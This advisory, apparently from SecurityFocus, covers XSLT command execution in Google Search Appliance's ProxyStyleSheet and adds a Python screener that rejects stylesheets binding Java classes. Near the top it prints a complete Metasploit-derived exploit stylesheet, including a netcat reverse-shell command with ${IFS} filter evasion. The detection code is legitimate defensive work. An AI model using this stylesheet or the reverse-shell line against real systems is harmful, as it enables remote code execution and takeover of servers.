Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities

An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided:

<xsl:template
    name="my_page_footer"
    xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
    xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>
<span>
<!-- Google Mini XSLT Code Execution [metasploit] -->

XSLT Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />

Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
</span>
</xsl:template>
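The stylesheet above works because the processor binds an XSLT namespace prefix to an arbitrary Java class (here java.lang.System and java.lang.Runtime) and lets XPath expressions call its static or instance methods. The following is an added example, not part of the advisory or of the Metasploit module, of a pre-acceptance check a defender can run over a user-supplied stylesheet before handing it to such a processor: it parses the document, flags every namespace prefix whose URI maps onto a Java class, and then flags each select/test expression that invokes a function through one of those prefixes. The Oracle URI form is the one shown in the advisory; the Xalan forms and the sample stylesheets are constructed assumptions. This is a screening aid; the actual fix is to process only trusted stylesheets or to run the processor with extension functions disabled.

```python
import io
import re
import xml.etree.ElementTree as ET

# Namespace URI shapes that bind an XSLT prefix to a Java class.
# The Oracle form is the one used by the advisory's stylesheet; the two
# Xalan forms are an assumption about another common Java XSLT processor.
JAVA_BINDING_PATTERNS = (
    re.compile(r"^http://www\.oracle\.com/XSL/Transform/java/"),
    re.compile(r"^http://xml\.apache\.org/xalan/java"),
    re.compile(r"^xalan://"),
)

# Attributes that carry XPath expressions in XSLT 1.0 stylesheets.
XPATH_ATTRIBUTES = ("select", "test")


def find_java_bindings(stylesheet: bytes) -> list[dict]:
    """Return a finding per Java-bound namespace declaration and per XPath
    expression that calls a function through one of those prefixes.

    'start-ns' events are delivered before the 'start' event of the element
    carrying the declaration, so the prefix table is complete by the time
    that element's attributes are inspected."""
    bound = {}      # prefix -> namespace URI
    findings = []
    events = ET.iterparse(io.BytesIO(stylesheet), events=("start-ns", "start"))
    for event, payload in events:
        if event == "start-ns":
            prefix, uri = payload
            if any(p.search(uri) for p in JAVA_BINDING_PATTERNS):
                bound[prefix] = uri
                findings.append({"kind": "namespace", "prefix": prefix, "uri": uri})
            continue
        elem = payload
        for attr in XPATH_ATTRIBUTES:
            expr = elem.get(attr)
            if not expr:
                continue
            for prefix in bound:
                # A function call through the prefix: prefix:name(
                if re.search(rf"\b{re.escape(prefix)}:[A-Za-z_][\w.]*\s*\(", expr):
                    findings.append({"kind": "call", "prefix": prefix, "expr": expr})
    return findings


def is_unsafe_stylesheet(stylesheet: bytes) -> bool:
    """True when the stylesheet should be rejected before transformation."""
    return bool(find_java_bindings(stylesheet))


# Constructed sample: shaped like the advisory's template, with a harmless
# command in place of the reverse-shell payload.  xmlns:xsl is declared so the
# fragment parses on its own.
MALICIOUS_STYLESHEET = b"""<xsl:template name="my_page_footer"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
    xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime">
<span>
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
<xsl:value-of select="run:exec(run:getRuntime(), 'uname')" />
</span>
</xsl:template>"""

# Constructed sample: a footer template that only uses standard XSLT.
SAFE_STYLESHEET = b"""<xsl:template name="my_page_footer"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<span>
XSLT Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
<xsl:if test="count(/results/result) &gt; 0">Results shown.</xsl:if>
</span>
</xsl:template>"""


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_STYLESHEET), ("safe", SAFE_STYLESHEET)):
        print(label, "rejected" if is_unsafe_stylesheet(doc) else "accepted")
        for f in find_java_bindings(doc):
            print("  ", f)
```

Matching on the namespace URI rather than on prefix names such as `run` or `sys` matters: the prefix is attacker-chosen and can be anything, while the URI is what the processor actually resolves to a class. Stylesheets that declare a Java-bound prefix but never call through it are still rejected, since the declaration alone has no legitimate use in a user-supplied template.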

An exploit for the Metasploit Framework is also available:


Copyright 2010, SecurityFocus